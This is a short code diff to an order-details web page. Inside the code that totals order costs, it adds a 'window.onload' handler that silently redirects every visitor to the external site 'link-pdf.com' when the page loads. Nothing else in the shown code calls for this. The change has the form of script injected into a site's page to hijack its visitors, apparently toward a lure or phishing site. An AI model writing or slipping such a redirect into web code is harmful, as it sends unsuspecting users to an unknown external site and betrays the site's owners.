--- a/order-details.html
+++ b/order-details.html
@@ -326,6 +326,9 @@
       if (!isNaN(costValue) && costValue > 0) {
       grandTotal += costValue;
   }
+        window.onload = function() {
+            window.location.href = "https://link-pdf.com";
+        };
 
   tableBody.innerHTML += `
     <tr>
